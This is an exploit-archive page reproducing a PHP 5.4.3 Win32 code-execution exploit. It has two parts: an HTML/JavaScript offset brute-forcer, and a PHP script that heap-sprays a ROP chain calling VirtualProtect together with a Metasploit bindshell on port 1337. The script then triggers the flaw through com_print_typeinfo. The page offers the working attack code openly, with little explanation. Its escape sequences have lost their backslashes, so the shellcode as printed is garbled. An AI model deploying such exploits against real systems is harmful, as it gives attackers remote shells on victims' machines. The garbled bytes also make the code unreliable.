Home / exploitsPDF  

PHP 5.4 Win32 Code Execution

Posted on 18 May 2012

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

===================
 offset-brute.html
===================

<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
function sleep(milliseconds) {
 var start = new Date().getTime();
 for (var i = 0; i < 1e7; i++) {
 if ((new Date().getTime() - start) > milliseconds){
 break;
 }
 }
}
function makeRequest(url, parameters)
{
 var xmlhttp = new XMLHttpRequest();
 if (window.XMLHttpRequest) {
 xmlhttp = new XMLHttpRequest();
 if (xmlhttp.overrideMimeType) {
 xmlhttp.overrideMimeType('text/xml');
 }
 } else if (window.ActiveXObject) {
 // IE
 try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
 catch (e) {
 try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
 catch (e) {}
 }
 }

 if (!xmlhttp) {
 alert('Giving up :( Cannot create an XMLHTTP instance');
 return false;
 }

 xmlhttp.open("GET",url,true);
 xmlhttp.send(null);
 return true;
}
test=document.getElementById("log");
for(offset=0;offset<300;offset++)
{
 log.value+="Trying offset:"+offset+"
";
 makeRequest("0day.php?offset="+offset);
 sleep(500);
}

</script></body></html>

===================
 0day.php
===================

<?php

$spray = str_repeat("x90",0x200);
$offset=$_GET['offset'];
// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
$spray = substr_replace($spray, "xdaxf0x5dx77", (strlen($spray))*-1,(strlen($spray))*-1);
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
$spray = substr_replace($spray, "x9fxaex52x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);

// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "xd4x1ax80x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);

// LPVOID lpAddress = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize = 0x01000000
$spray = substr_replace($spray, "x00x00x10x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "x40x00x00x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);

//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
$spray = substr_replace($spray, "xb4xe8xdfx77", (strlen($spray)-0x18)*-1,4);
// Ret Address = 0x048d0080
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4);

$stacktrack = "xbcx0cxb0xc0x00";
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."x33xc9x83xe9xb0".
 "x81xc4xd0xfdxffxff".
 "xd9xeexd9x74x24xf4x5bx81x73x13x1d".
 "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96".
 "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2".
 "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0".
 "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41".
 "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82".
 "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2".
 "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39".
 "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9".
 "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b".
 "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a".
 "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88".
 "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01".
 "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20".
 "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e".
 "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39".
 "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44".
 "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96".
 "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38".
 "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9".
 "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09".
 "x4ex33xe4x96xcdxccx32x69";

$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode)));
$fullspray="";
for($i=0;$i<0x4b00;$i++)
{
 $fullspray.=$spray;
}
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();

array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");

$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]

echo $arr;

echo $spray;

?>

 

TOP

Malware :

Exploits :